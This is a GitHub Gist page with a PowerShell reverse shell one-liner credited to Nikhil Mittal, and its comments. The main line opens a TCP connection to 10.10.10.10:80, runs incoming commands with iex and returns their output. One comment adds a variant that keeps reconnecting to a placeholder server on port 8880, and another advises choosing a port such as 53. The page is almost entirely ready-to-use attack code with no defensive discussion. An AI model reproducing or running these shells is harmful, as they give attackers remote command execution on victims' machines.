Last active
October 11, 2024 13:26
-
-
Save egre55/c058744a4240af6515eb32b2d33fbed3 to your computer and use it in GitHub Desktop.
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
while($true){try{$c=New-Object System.Net.Sockets.TCPClient("your server",8880);$s=$c.GetStream();$nl=[Environment]::NewLine;$m=[System.Text.Encoding]::UTF8.GetBytes('asprsh'+$nl+'{"a":"a"}'+$nl);$s.Write($m,0,$m.Length);$s.Flush();[byte[]]$b=0..65535|%{0};while($true){if(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ec=@("exit", "quit", "bye", "logout", "close");if($d -in $ec) {continue;} else { $g=(iex $d 2>&1 | Out-String );$w=$g+$nl+"PS "+(pwd).Path+"# ";$p=([text.encoding]::ASCII).GetBytes($w);$s.Write($p,0,$p.Length);$s.Flush()}};$c.Close();}catch{Start-Sleep -Seconds 2};};
Congrats bro, you made it into a CompTIA sponsored course on cybersecurity
https://i.imgur.com/eN7OCjl.png
I think I was pretty clear on attribution @jzburda
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
In order to connect via port 4444, port 4444 has to also be open on your target. Try a different port like 53